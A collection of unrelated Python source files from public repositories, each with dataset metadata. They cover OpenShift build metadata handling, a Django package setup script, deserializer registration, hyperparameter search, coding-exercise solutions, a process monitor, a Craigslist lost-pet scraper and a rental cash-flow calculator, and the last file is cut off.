exectools.cmd_assert('git rev-parse HEAD', strip=True)\n self.logger.debug(f'scan-sources coordinate: upstream_commit_hash: {upstream_commit_hash}')\n\n dgr_path = pathlib.Path(dgr.distgit_dir)\n if self.namespace == 'containers' or self.namespace == 'apbs':\n dockerfile_path = dgr_path.joinpath('Dockerfile')\n if not dockerfile_path.is_file():\n return True, 'Distgit dockerfile not found -- appears that no rebase has ever been performed'\n dfp = DockerfileParser(str(dockerfile_path))\n last_distgit_rebase_upstream_hash = dfp.envs.get('SOURCE_GIT_COMMIT', None)\n self.logger.debug(f'scan-sources coordinate: last_distgit_rebase_upstream_hash: {last_distgit_rebase_upstream_hash}')\n if last_distgit_rebase_upstream_hash != upstream_commit_hash:\n return True, f'Distgit contains SOURCE_GIT_COMMIT hash {last_distgit_rebase_upstream_hash} different from upstream HEAD {upstream_commit_hash}'\n elif self.namespace == 'rpms':\n specs = list(dgr_path.glob('*.spec'))\n if not specs:\n return True, 'Distgit .spec file not found -- appears that no rebase has ever been performed'\n with specs[0].open(mode='r', encoding='utf-8') as spec_handle:\n spec_content = spec_handle.read()\n if upstream_commit_hash not in spec_content:\n return True, f'Distgit spec file does not contain upstream hash {upstream_commit_hash}'\n else:\n raise IOError(f'Unknown namespace type: {self.namespace}')\n\n if distgit_head_commit_ts_seconds > latest_build_creation_ts_seconds:\n # Distgit is ahead of the latest build.\n # We've likely made an attempt to rebase and the subsequent build failed.\n # Try again if we are at least 6 hours out from the build to avoid\n # pestering image owners will repeated build failures.\n if distgit_head_commit_ts_seconds - latest_build_creation_ts_seconds > (6 * one_hour):\n return True, 'It has been 6 hours since last failed build attempt'\n return False, f'Distgit commit ts {distgit_head_commit_ts_seconds} ahead of last successful build ts {latest_build_creation_ts_seconds}, but holding off for at least 6 hours before rebuild'\n else:\n # The latest build is newer than the latest distgit commit. No change required.\n return False, 'Latest build is newer than latest upstream/distgit commit -- no build required'\n\n def get_maintainer_info(self):\n \"\"\"\n :return: Returns a dict of identifying maintainer information. Dict might be empty if no maintainer information is available.\n fields are generally [ component: '...', subcomponent: '...', and product: '...' ] if available. These\n are coordinates for product security to figure out where to file bugs when an image or RPM has an issue.\n \"\"\"\n\n # We are trying to discover some team information that indicates which BZ or Jira board bugs for this\n # component should be filed against. This information can be stored in the doozer metadata OR\n # in upstream source. Metadata overrides, as usual.\n\n source_dir = self.runtime.resolve_source(self)\n\n # Maintainer info can be defined in metadata, so try there first.\n maintainer = self.config.maintainer or dict()\n\n # This tuple will also define key ordering in the returned OrderedDict\n known_fields = ('product', 'component', 'subcomponent')\n\n # Fill in any missing attributes from upstream source\n if source_dir:\n with Dir(source_dir):\n # Not every repo has a master branch, they may have a different default; detect it.\n if self.public_upstream_url:\n # If there is a public upstream, query it for the default branch. The openshift-priv\n # clones seem to be non-deterministic on which branch is set as default.\n remote_info, _ = exectools.cmd_assert('git remote show public_upstream')\n else:\n remote_info, _ = exectools.cmd_assert('git remote show origin')\n head_branch_lines = [i for i in remote_info.splitlines() if i.strip().startswith('HEAD branch:')] # e.g. [ \" HEAD branch: master\" ]\n if not head_branch_lines:\n raise IOError('Error trying to detect remote default branch')\n default_branch = head_branch_lines[0].strip().split()[-1] # [ \" HEAD branch: master\" ] => \"master\"\n\n _, owners_yaml, _ = exectools.cmd_gather(f'git --no-pager show origin/{default_branch}:OWNERS')\n if owners_yaml.strip():\n owners = yaml.safe_load(owners_yaml)\n for field in known_fields:\n if field not in maintainer and field in owners:\n maintainer[field] = owners[field]\n\n if 'product' not in maintainer:\n maintainer['product'] = 'OpenShift Container Platform' # Safe bet - we are ART.\n\n # Just so we return things in a defined order (avoiding unnecessary changes in git commits)\n sorted_maintainer = OrderedDict()\n for k in known_fields:\n if k in maintainer:\n sorted_maintainer[k] = maintainer[k]\n\n # Add anything remaining in alpha order\n for k in sorted(maintainer.keys()):\n if k not in sorted_maintainer:\n sorted_maintainer[k] = maintainer[k]\n\n return sorted_maintainer\n\n def extract_kube_env_vars(self) -> Dict[str, str]:\n \"\"\"\n Analyzes the source_base_dir for either Godeps or go.mod and looks for information about\n which version of Kubernetes is being utilized by the repository. Side effect is cloning distgit\n and upstream source if it has not already been done.\n :return: A Dict of environment variables that should be added to the Dockerfile / rpm spec.\n Variables like KUBE_GIT_VERSION, KUBE_GIT_COMMIT, KUBE_GIT_MINOR, ...\n May be empty if there is no kube information in the source dir.\n \"\"\"\n envs = dict()\n\n upstream_source_path: pathlib.Path = self.runtime.resolve_source(self)\n if not upstream_source_path:\n # distgit only. Return empty.\n return envs\n\n kube_version_fields: List[str] = None # Populate ['x', 'y', 'z'] this from godeps or gomod\n kube_commit_hash: str = None # Populate with kube repo hash like '2f054b7646dc9e98f6dea458d2fb65e1d2c1f731'\n with Dir(upstream_source_path):\n out, _ = exectools.cmd_assert([\"git\", \"rev-parse\", \"HEAD\"])\n source_full_sha = out.strip()\n\n # First determine if this source repository is using Godeps. Godeps is ultimately\n # being replaced by gomod, but older versions of OpenShift continue to use it.\n godeps_file = pathlib.Path(upstream_source_path, 'Godeps', 'Godeps.json')\n if godeps_file.is_file():\n try:\n with godeps_file.open('r', encoding='utf-8') as f:\n godeps = json.load(f)\n # Reproduce https://github.com/openshift/origin/blob/6f457bc317f8ca8e514270714db6597ec1cb516c/hack/lib/build/version.sh#L82\n # Example of what we are after: https://github.com/openshift/origin/blob/6f457bc317f8ca8e514270714db6597ec1cb516c/Godeps/Godeps.json#L10-L15\n for dep in godeps.get('Deps', []):\n if dep.get('ImportPath', '') == 'k8s.io/kubernetes/pkg/api':\n kube_commit_hash = dep.get('Rev', '')\n raw_kube_version = dep.get('Comment', '') # e.g. v1.14.6-152-g117ba1f\n # drop release information.\n base_kube_version = raw_kube_version.split('-')[0] # v1.17.1-152-g117ba1f => v1.17.1\n kube_version_fields = base_kube_version.lstrip('v').split('.') # v1.17.1 => [ '1', '17', '1']\n except:\n self.logger.error(f'Error parsing godeps {str(godeps_file)}')\n traceback.print_exc()\n\n go_sum_file = pathlib.Path(upstream_source_path, 'go.sum')\n if go_sum_file.is_file():\n try:\n # we are looking for a line like: https://github.com/openshift/kubernetes/blob/5241b27b8acd73cdc99a0cac281645189189f1d8/go.sum#L602\n # e.g. \"k8s.io/kubernetes v1.19.0-rc.2/go.mod h1:zomfQQTZYrQjnakeJi8fHqMNyrDTT6F/MuLaeBHI9Xk=\"\n with go_sum_file.open('r', encoding='utf-8') as f:\n for line in f.readlines():\n if line.startswith('k8s.io/kubernetes '):\n entry_split = line.split() # => ['k8s.io/kubernetes', 'v1.19.0-rc.2/go.mod', 'h1:zomfQQTZYrQjnakeJi8fHqMNyrDTT6F/MuLaeBHI9Xk=']\n base_kube_version = entry_split[1].split('/')[0].strip() # 'v1.19.0-rc.2/go.mod' => 'v1.19.0-rc.2'\n kube_version_fields = base_kube_version.lstrip('v').split('.') # 'v1.19.0-rc.2' => [ '1', '19', '0-rc.2']\n # upstream kubernetes creates a tag for each version. Go find its sha.\n rc, out, err = exectools.cmd_gather('git ls-remote https://github.com/kubernetes/kubernetes {base_kube_version}')\n out = out.strip()\n if out:\n # Expecting something like 'a26dc584ac121d68a8684741bce0bcba4e2f2957\trefs/tags/v1.19.0-rc.2'\n kube_commit_hash = out.split()[0]\n else:\n # That's strange, but let's not kill the build for it. Poke in our repo's hash.\n kube_commit_hash = source_full_sha\n break\n except:\n self.logger.error(f'Error parsing go.sum {str(go_sum_file)}')\n traceback.print_exc()\n\n if kube_version_fields:\n # For historical consistency with tito's flow, we add +OS_GIT_COMMIT[:7] to the kube version\n envs['KUBE_GIT_VERSION'] = f\"v{'.'.join(kube_version_fields)}+{source_full_sha[:7]}\"\n envs['KUBE_GIT_MAJOR'] = '0' if len(kube_version_fields) < 1 else kube_version_fields[0]\n godep_kube_minor = '0' if len(kube_version_fields) < 2 else kube_version_fields[1]\n envs['KUBE_GIT_MINOR'] = f'{godep_kube_minor}+' # For historical reasons, append a '+' since OCP patches its vendored kube.\n envs['KUBE_GIT_COMMIT'] = kube_commit_hash\n envs['KUBE_GIT_TREE_STATE'] = 'clean'\n elif self.name in ('openshift-enterprise-hyperkube', 'openshift', 'atomic-openshift'):\n self.logger.critical(f'Unable to acquire KUBE vars for {self.name}. This must be fixed or platform addons can break: https://bugzilla.redhat.com/show_bug.cgi?id=1861097')\n raise IOError(f'Unable to determine KUBE vars for {self.name}')\n\n return envs\n","repo_name":"Global19-atlassian-net/doozer","sub_path":"doozerlib/metadata.py","file_name":"metadata.py","file_ext":"py","file_size_in_byte":23203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"} +{"seq_id":"34603509799","text":"#!/usr/bin/env python\nfrom __future__ import print_function\n\nimport os\nimport re\nimport sys\n\nfrom setuptools import setup\n\n\ndef read(*paths):\n \"\"\"\n Build a file path from paths and return the contents.\n \"\"\"\n with open(os.path.join(*paths), 'r') as f:\n return f.read()\n\n\ndef get_version(package):\n \"\"\"\n Return package version as listed in `__version__` in `init.py`.\n \"\"\"\n init_py = open(os.path.join(package, '__init__.py')).read()\n return re.search(\"__version__ = ['\\\"]([^'\\\"]+)['\\\"]\", init_py).group(1)\n\n\ndef get_packages(package):\n \"\"\"\n Return root package and all sub-packages.\n \"\"\"\n return [dirpath\n for dirpath, dirnames, filenames in os.walk(package)\n if os.path.exists(os.path.join(dirpath, '__init__.py'))]\n\n\ndef get_package_data(package):\n \"\"\"\n Return all files under the root package, that are not in a\n package themselves.\n \"\"\"\n walk = [(dirpath.replace(package + os.sep, '', 1), filenames)\n for dirpath, dirnames, filenames in os.walk(package)\n if not os.path.exists(os.path.join(dirpath, '__init__.py'))]\n\n filepaths = []\n for base, filenames in walk:\n filepaths.extend([os.path.join(base, filename)\n for filename in filenames])\n return {package: filepaths}\n\n\nif sys.argv[-1] == 'publish':\n os.system(\"python3 setup.py sdist bdist_wheel\")\n os.system(\"twine check dist/*\")\n os.system(\"twine upload dist/*\")\n print(\"You probably want to also tag the version now:\")\n print(\" git tag -a {0} -m 'version {0}'\".format(\n get_version('rest_framework_app_api')))\n print(\" git push --tags\")\n sys.exit()\n\nsetup(\n name='djangorestframework-appapi',\n version=get_version('rest_framework_app_api'),\n url='https://github.com/allran/djangorestframework-appapi',\n license='BSD',\n description='A Django REST framework API adapter for the App(IOS, Andorid, WebApp) API spec.',\n long_description=read('README.rst'),\n long_description_content_type='text/x-rst',\n author='Allran.Qu',\n author_email='',\n packages=get_packages('rest_framework_app_api'),\n package_data=get_package_data('rest_framework_app_api'),\n classifiers=[\n 'Development Status :: 5 - Production/Stable',\n 'Environment :: Web Environment',\n 'Framework :: Django',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: BSD License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n 'Topic :: Internet :: WWW/HTTP',\n 'Topic :: Software Development :: Libraries :: Application Frameworks',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n ],\n install_requires=[\n 'djangorestframework>=3.10',\n 'django>=1.11',\n ],\n extras_require={\n\n },\n python_requires=\">=3.5\",\n zip_safe=False,\n)\n","repo_name":"allran/djangorestframework-appapi","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":3103,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"7784217867","text":"from enum import Enum\nimport typing\n\nfrom pydantic import BaseModel\nfrom .base_deserialzier import BaseDeserializer\nfrom .primitive_deserialzier import PrimitiveDeserializer, NoneDeserializer\nfrom .enum_deserializer import EnumDeserializer\nfrom .object_deserializer import ObjectDeserializer\n\n\nDefaultDeserializerLUT: typing.Dict[\n typing.Union[typing.Literal[\"None\"], typing.Type[typing.Any]],\n BaseDeserializer[typing.Any],\n] = {\n \"None\": NoneDeserializer(),\n str: PrimitiveDeserializer(lambda x: x.as_str(inner=False), \"Expected str\", rank=1),\n bool: PrimitiveDeserializer(lambda x: x.as_bool(), \"Expected bool\", rank=2),\n int: PrimitiveDeserializer(lambda x: x.as_int(), \"Expected int\", rank=3),\n float: PrimitiveDeserializer(lambda x: x.as_float(), \"Expected float\", rank=4),\n}\n\nGeneratedDeserializerLUT: typing.Dict[str, BaseDeserializer[typing.Any]] = {}\n\nENM = typing.TypeVar(\"ENM\", bound=Enum)\n\n\nT = typing.TypeVar(\"T\", bound=typing.Union[BaseModel, Enum])\n\n\ndef register_deserializer(\n aliases: typing.Dict[str, str] = {},\n) -> typing.Callable[[typing.Type[T]], typing.Type[T]]:\n \"\"\"\n Decorator to register a new deserializer.\n\n Args:\n aliases (Dict[str, str], optional): The alias to enum mapping. Defaults to {}.\n alias_to_field (Dict[str, str], optional): The alias to field mapping. Defaults to {}.\n\n Raises:\n AssertionError: If the type is already registered.\n \"\"\"\n\n def decorator(cls: typing.Type[T]) -> typing.Type[T]:\n global GeneratedDeserializerLUT\n assert (\n cls.__name__ not in GeneratedDeserializerLUT\n ), f\"Cannot register {cls.__name__} twice.\"\n if issubclass(cls, Enum):\n GeneratedDeserializerLUT[cls.__name__] = EnumDeserializer(\n enm=cls, aliases=aliases\n )\n else:\n assert issubclass(\n cls, BaseModel\n ), f\"Cannot register {cls.__name__}. Must be a subclass of BaseModel.\"\n GeneratedDeserializerLUT[cls.__name__] = ObjectDeserializer(\n model=cls,\n alias_to_field=aliases,\n )\n return cls\n\n return decorator\n\n\n__all__ = [\n \"register_deserializer\",\n]\n","repo_name":"GlooHQ/baml","sub_path":"clients/python/baml_lib/_impl/deserializer/exports.py","file_name":"exports.py","file_ext":"py","file_size_in_byte":2224,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"73233741530","text":"import hpopt\nimport numpy as np\nfrom multiprocessing import Process\nimport time\n\ndef my_model(step, width, height):\n return (0.1 + width * step / 100)**(-1) + height * 0.1\n\n\ndef my_trainer(config):\n # Hyperparameters\n width, height = config['params']['width'], config['params']['height']\n\n for step in range(config[\"iterations\"]):\n # Iterative training function - can be an arbitrary training procedure\n score = my_model(step, width, height)\n # \n if hpopt.report(config=config, score=score) == hpopt.Status.STOP:\n break\n\n\nhp_configs = {\"width\": hpopt.search_space(\"uniform\", [10, 100]),\n \"height\": hpopt.search_space(\"uniform\", [0, 100])}\n\nmy_hpo = hpopt.create(save_path='./tmp/my_hpo_asha',\n search_alg=\"asha\",\n search_space=hp_configs,\n mode='min',\n num_trials=100,\n min_iterations=1,\n max_iterations=100,\n num_brackets=5,\n reduction_factor=3,\n num_full_iterations=50,\n full_dataset_size=2500)\nprint(my_hpo.rungs_in_brackets)\nexit()\nnum_max_workers = 10\nproc_list = []\n\nwhile True:\n num_active_workers = 0\n for p in proc_list:\n if p.is_alive():\n num_active_workers += 1\n else:\n p.close()\n proc_list.remove(p)\n\n while num_active_workers < num_max_workers:\n config = my_hpo.get_next_sample()\n\n if config is None:\n break\n\n p = Process(target=my_trainer, args=(config, ))\n proc_list.append(p)\n p.start()\n num_active_workers += 1\n\n # All trials are done.\n if num_active_workers == 0:\n break\n\nprint(\"best hp: \", my_hpo.get_best_config())\n","repo_name":"openvinotoolkit/hyper_parameter_optimization","sub_path":"samples/asha.py","file_name":"asha.py","file_ext":"py","file_size_in_byte":1831,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"32"} +{"seq_id":"21602736926","text":"from heapq import heappop, heappush\n\nN, K = map(int, input().split())\n\nnums = list(map(int, input().split()))\n\ngroups = []\n\nfor i in range(K):\n groups.append([])\n\n# K-stepで配列の生成\n# Kで割った余りが等しいindexを同じグループに入れる\nfor i in range(N + (K - N % K)):\n if len(nums) <= i:\n num = 2 ** 60\n else:\n num = nums[i]\n groups[i % K].append(num)\n\nfor i, nums in enumerate(groups):\n groups[i] = sorted(nums)\n\ncan = True\n\nfor nums in zip(*groups):\n nums = list(nums)\n exp = sorted(nums)\n if exp != nums:\n can = False\n break\n\nprint(\"Yes\" if can else \"No\")\n","repo_name":"lgtm-migrator/algo-practices","sub_path":"atcoder/ABC254/C_new.py","file_name":"C_new.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"26587124189","text":"# We run a Candy shop where we sell candies and lollipops\n# One lollipop's price is 10$\n# And it made from 5gr of sugar\n# One candy's price is 20$\n# And it made from 10gr of sugar\n# we can raise their prices with a given percentage\n#\n\n# It can store sugar and money as income. The constructor should take the amount of sugar in gramms.\n# we can create lollipops and candies store them in the CandyShop's storage\n# If we create a candy or lollipop the CandyShop's sugar amount gets reduced by the amount needed to create the sweets\n# We can raise the prices of all candies and lollipops with a given percentage\n# We can sell candy or lollipop with a given number as amount\n# If we sell sweets the income will be increased by the price of the sweets and we delete it from the inventory\n# We can buy sugar with a given number as amount. The price of 1000gr sugar is 100$\n# If we buy sugar we can raise the CandyShop's amount of sugar and reduce the income by the price of it.\n# The CandyShop should be represented as string in this format:\n# \"Inventory: 3 candies, 2 lollipops, Income: 100, Sugar: 400gr\"\n\n\n# \"Inventory: 3 candies\n# \"Inventory: {candy_amount} candies\n\n# Income: 100\n# {Income} income\n# Income: {income}\n\n\n# Create a CandyShop class\n\nclass CandyShop(object):\n\n def __init__(self, sugar):\n self.sugar = sugar\n self.candies = 0\n self.lollipops = 0\n self.income = 0\n self.candy_price = 20\n self.lollipop_price = 10\n \n def create_sweets(self, sweet_name):\n if sweet_name == \"candy\":\n if self.sugar >= 10:\n self.sugar -= 10\n self.candies += 1 \n if sweet_name == \"lollipop\":\n if self.sugar >= 5:\n self.sugar -= 5\n self.lollipops += 1 \n \n \n \n def raise_prices(self, percentage):\n price_raise = 1 + percentage/100\n self.candy_price *= price_raise\n self.lollipop_price *= price_raise\n\n \n def sell(self, sweet_name, amount):\n if sweet_name == \"candy\":\n if 0 < amount <= self.candies:\n self.candies -= amount\n self.income += amount * self.candy_price\n if sweet_name == \"lollipop\":\n if 0 < amount <= self.lollipops:\n self.lollipops -= amount\n self.income += amount * self.lollipop_price\n \n def buy_sugar(self, amount):\n sugar_price = amount * 0.1\n if self.income >= sugar_price:\n self.income -= sugar_price\n self.sugar += amount\n \n def __str__(self):\n return \"Inventory: {candy_amount} candies, {lollipop_amount} lollipops, Income: {income}, Sugar: {sugar}gr\".format(\n candy_amount=self.candies,\n lollipop_amount=self.lollipops,\n income=self.income,\n sugar=self.sugar)\n \n \n \n \n\n\ncandy_shop = CandyShop(300)\ncandy_shop.create_sweets(\"candy\")\ncandy_shop.create_sweets(\"candy\")\ncandy_shop.create_sweets(\"lollipop\")\ncandy_shop.create_sweets(\"lollipop\")\nprint(candy_shop)\n# Should print out:\n# Inventory: 2 candies, 2 lollipops, Income: 0, Sugar: 270gr\ncandy_shop.sell(\"candy\", 1)\nprint(candy_shop)\n# Should print out:\n# \"Inventory: 1 candies, 2 lollipops, Income:20, Sugar: 270gr\"\ncandy_shop.raise_prices(5)\ncandy_shop.sell(\"lollipop\", 1)\nprint(candy_shop)\n# Should print out:\n# \"Inventory: 1 candies, 1 lollipops, Income:30.5, Sugar: 270gr\"\ncandy_shop.buy_sugar(300)\nprint(candy_shop)\n# Should print out:\n# \"Inventory: 1 candies, 1 lollipops, Income:5, Sugar: 570gr\"\n\n\n","repo_name":"green-fox-academy/MartonG11","sub_path":"holiday_preparation/candyshop.py","file_name":"candyshop.py","file_ext":"py","file_size_in_byte":3606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"1835877356","text":"import pycron\nimport psutil\nimport os\nimport time\nfrom datetime import datetime, timedelta\nimport logging\nimport importlib\nfrom threading import Event\nfrom sysinvest.common.plugin import MonitorPlugin\nfrom sysinvest.common.watchdog import ProcessWatchdog\nimport sysinvest.common.api as API\nfrom sysinvest.common.configuration import ConfigLoader\n\n\nclass Monitor( list ):\n def __init__( self, config_class: ConfigLoader ):\n super().__init__()\n self.log = logging.getLogger( 'monitor' )\n self.__p = psutil.Process( os.getpid() )\n self.__event = Event()\n self.__running = False\n self.__passes = 0\n self.__cfgClass = config_class\n self.__cfgIndex = 0\n self.loadModules()\n return\n\n def loadModules( self ):\n self.__cfgIndex += 1\n for obj in self.__cfgClass.Configuration[ 'objects' ]:\n try:\n module = obj[ 'module' ]\n mod = None\n self.log.info( f'Loading monitor: {obj}')\n for mod_path in ( '', 'sysinvest.', 'sysinvest.monitor.' ):\n try:\n mod = importlib.import_module( f'{mod_path}{module}' )\n getattr(mod, 'CLASS_NAME')\n _class = getattr(mod, getattr(mod, 'CLASS_NAME'))\n executor = _class( self, obj )\n if executor not in self:\n self.append( executor )\n\n executor.ConfigIndex = self.__cfgIndex\n executor.ConfigDateTime = datetime.now()\n break\n\n except:\n pass\n\n if mod is None:\n self.log.error( f\"Could not load {obj}\")\n\n except Exception:\n self.log.exception( f\"During module load: {obj}\" )\n\n return\n\n def addToQueue( self, result ):\n self.log.info( f\"Queue add {API.QUEUE.qsize()}\" )\n API.QUEUE.put_nowait( result )\n self.log.info( f\"Queue: {API.QUEUE.qsize()} Done\" )\n return\n\n @property\n def Name( self ):\n return \"ProcessMonitor\"\n\n @property\n def Attributes( self ):\n return {}\n\n def info( self ) -> dict:\n startTime = datetime.fromtimestamp( self.__p.create_time() )\n upTime = datetime.now() - startTime\n return {\n 'since': startTime.strftime( '%Y-%m-%d %H:%M:%S' ),\n 'uptime': f\"{upTime.days} - {str(timedelta( seconds = upTime.seconds ))}\",\n 'passes': self.__passes,\n 'tasks': len( self )\n }\n\n def stop( self ):\n self.__event.set()\n return\n\n def run( self ):\n wd = ProcessWatchdog()\n isStarting = True\n try:\n while not self.__event.is_set():\n wd.trigger()\n self.__passes += 1\n start = int( time.time() )\n for task in self:\n task: MonitorPlugin\n if not task.Enabled:\n continue\n\n if not pycron.is_now( task.Cron ) and not isStarting:\n continue\n\n self.log.info( f\"{task.Name} is being started\" )\n if task.execute():\n task.resetHits()\n\n self.log.info( f\"{task.Name} is finished\" )\n\n isStarting = False\n # Loop time should be about a minute, sleep the remaining time\n sleepTime = 60 - ( int( time.time() ) - start )\n self.log.info( f\"Sleep time: {sleepTime}\" )\n if sleepTime > 0:\n self.__event.wait( sleepTime )\n\n if len( self ) < len( self.__cfgClass.Configuration[ 'objects' ] ):\n # We need to load more modules\n self.loadModules()\n\n except:\n raise\n\n finally:\n # Stop all threaded tasks\n for task in self:\n if hasattr( task, 'stop' ):\n task.stop()\n\n return\n","repo_name":"pe2mbs/sysinvest","sub_path":"sysinvest/common/monitor.py","file_name":"monitor.py","file_ext":"py","file_size_in_byte":4172,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70900839132","text":"import scrapy\nfrom scrapy.contrib.spiders import Rule, CrawlSpider\nfrom scrapy.contrib.linkextractors.sgml import SgmlLinkExtractor\nfrom items import LostPetItem\nimport datetime\n# from lostpet.items import LostPetItem\n\n\n\n\n#'https://sfbay.craigslist.org/search/laf?query=dog&lost_and_found_type=1'\n\ndef clean_string(list_string):\n concate = \"\"\n for string in list_string:\n concate += string.rstrip()\n concate = concate.replace(\"\\n\", \"\", 10)\n return concate\n\n#\n\n\nclass PetSpider(CrawlSpider):\n\n # \"https://sfbay.craigslist.org/search/laf?query=cat&lost_and_found_type=1\"\n\n name = \"lostpets\"\n allowed_domains = [\"sfbay.craigslist.org\"]\n start_urls = [\"https://sfbay.craigslist.org/search/laf?query=dog&lost_and_found_type=1\",\n \"https://sfbay.craigslist.org/search/laf?query=cat&lost_and_found_type=1\"]\n\n # https://sfbay.craigslist.org/eby/laf/d/lost-dog-please-help-reward/6454192457.html\n rules = [\n Rule(SgmlLinkExtractor(allow=[r'.*?/.+?/laf/d/.+/\\d+\\.html']), callback='parse_pet', follow=False)]\n\n def parse_pet(self, response):\n url = response.url\n title = response.xpath('//*[@id=\"titletextonly\"]/text()').extract()[0]\n img = response.xpath('//*[@id=\"thumbs\"]/a/@href').extract()\n description = response.xpath('//*[@id=\"postingbody\"]/text()').extract()\n description = clean_string(description)\n date_list = response.xpath('//*[@id=\"display-date\"]/time/@datetime').extract()\n date = datetime.datetime.strptime(date_list[0], \"%Y-%m-%dT%H:%M:%S-%f\")\n\n mapdata = response.xpath('//*[@id=\"map\"]')\n longitude = None\n latitude = None\n if len(mapdata) != 0:\n longitude = float(mapdata.xpath(\"@data-longitude\").extract()[0])\n latitude = float(mapdata.xpath(\"@data-latitude\").extract()[0])\n\n sidebar = response.xpath('/html/body/section/section/section/div[1]/div/div[2]/text()')\n if len(sidebar) != 0:\n address = response.xpath('/html/body/section/section/section/div[1]/div/div[2]/text()').extract()[0]\n url_google = response.xpath('/html/body/section/section/section/div[1]/div/p/small/a/@href').extract()\n else:\n address = response.xpath('/html/body/section/section/h2/span[2]/small/text()').extract()\n url_google = None\n\n item = LostPetItem(title=title,\n url=url,\n img=img,\n description=description,\n longitude=longitude,\n latitude=latitude,\n address=address,\n date=date,\n url_google=url_google)\n\n yield item\n","repo_name":"Yosolita1978/Lost_Pet_Hackbright","sub_path":"lostpet/lostpet/spiders/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"23668242850","text":"class Solution:\n def letterCombinations(self, digits):\n if len(digits) == 0:\n return []\n digit_map = {\n 2: ['a', 'b', 'c'],\n 3: ['d', 'e', 'f'],\n 4: ['g', 'h', 'i'],\n 5: ['j', 'k', 'l'],\n 6: ['m', 'n', 'o'],\n 7: ['p', 'q', 'r', 's'],\n 8: ['t', 'u', 'v'],\n 9: ['w', 'x', 'y', 'z']\n }\n ans = list()\n curr = list()\n self.soln(digits, ans, curr, 0, digit_map)\n\n return ans\n\n def soln(self, digits, ans, curr, index, digit_map):\n if index > len(digits):\n return\n\n if len(curr) == len(digits):\n ans.append(''.join(curr))\n return\n\n if index < len(digits):\n\n alphas = digit_map[int(digits[index])]\n for alpha in alphas:\n curr.append(alpha)\n self.soln(digits, ans, curr, index + 1, digit_map)\n curr.pop()\n\n\ns = Solution()\n\nprint(s.letterCombinations('22'))\n","repo_name":"EashanKaushik/LeetCode","sub_path":"30-Day-Challange/Day-10/phone_combo.py","file_name":"phone_combo.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70681929053","text":"from igraph import *\nimport cairo\nimport Labels\n\ndef displayG(g):\n layout = g.layout(\"kk\")\n plot(g, layout = layout, target=g['name'] + '.png')\n # plot(g)\n\nclass LabelCompression:\n\n def __init__(self):\n self.HASH = dict()\n self.HASH['index'] = '0'\n\n def getHASH(self):\n return self.HASH\n\n def createTestGraph(self):\n testGraph = Graph.GRG(10, 0.2)\n i = 1\n for v in testGraph.vs:\n v[Labels.CURRENT_LABEL_STR] = str(i%3 + 1)\n i = i + 1\n\n testGraph['name'] = 'LGtest'\n return testGraph\n\n def compress(self, g):\n labels = []\n labels = [ v[Labels.CURRENT_LABEL_STR] for v in g.vs ]\n\n labels.sort()\n\n for s in labels:\n fs = -1\n if s not in self.HASH:\n currentIndex = self.HASH['index']\n newIndex = str(int(currentIndex) + 1)\n self.HASH['index'] = newIndex\n fs = newIndex\n self.HASH[s] = fs\n\n #relabelling\n for v in g.vs:\n v[Labels.PREV_LABEL] = self.HASH[v[Labels.CURRENT_LABEL_STR]]\n\n g.setOfNewlyCreatedLabels = set([ v[Labels.PREV_LABEL] for v in g.vs ])\n return g\n\n def testGraph(self):\n return self.testGraph\n\n","repo_name":"yogeshdixit41/Weisfeiler-Lehman-Graph-Isomorphism-Test-Implementation","sub_path":"Compression.py","file_name":"Compression.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"32"} +{"seq_id":"8512519224","text":"# income:\n # - rental income = 2000/month\n # total income = 2000/month\n\n# purchase price 200,000\n\n# expenses:\n # - taxes = 150/month\n # - insurance = 100/month\n # - utilities = 0/month\n # - elec\n # - water\n # - sewer\n # - gas\n # - hoa = 0/month\n # - lawn/snow = 0/month\n # - vacancy = 100/month\n # - repairs = 100/month\n # - capex = 100/month\n # - property mangement = 200/month\n # - mortgage = 860/month\n\n # total = 1610/month\n\n# cashflow = 390/month\n\n# cash on cash roi\n # - downpayment = 40,000\n # - closing costs = 3000\n # - rehab budget = 7000\n # - misc = 0\n # total investment = 50,000\n\n# anual cash flow = 4680\n\n# cash on cash roi = 9.36%\n\nclass CashOnCash():\n \"\"\"\n the purpose of this class is to provide information about cash on cash ROI \n for a rental property\n \"\"\"\n def __init__(self, income):\n self.income = income\n\n def expenses(\n self, taxes, insurance, vacancy, repairs, capex, property_management, \n mortgage, utilities = 0, hoa = 0, ls = 0):\n self.taxes = taxes\n self.insurance = insurance\n self.vacancy = vacancy\n self.repairs = repairs\n self.capex = capex\n self.property_management = property_management\n self.mortgage = mortgage\n self.utilities = utilities\n self.hoa = hoa\n self.ls = ls\n\n self.total = self.taxes + self.insurance + self.vacancy + self.repairs + self.capex \n self.total += self.property_management + self.mortgage + self.hoa + self.utilities + self.ls\n\n return self.total\n \n def cashflow(self):\n return self.income - self.total\n \n def invested(self):\n self.down = int(input(\"What was the down payment? \"))\n self.closing = int(input(\"What were the closing costs? \"))\n self.rehab = int(input(\"What was the rehab budget? \"))\n self.misc = int(input(\"What were the misc costs? \"))\n\n return self.down + self.closing + self.rehab + self.misc\n \n def anual_cashflow(self):\n return CashOnCash.cashflow(self) * 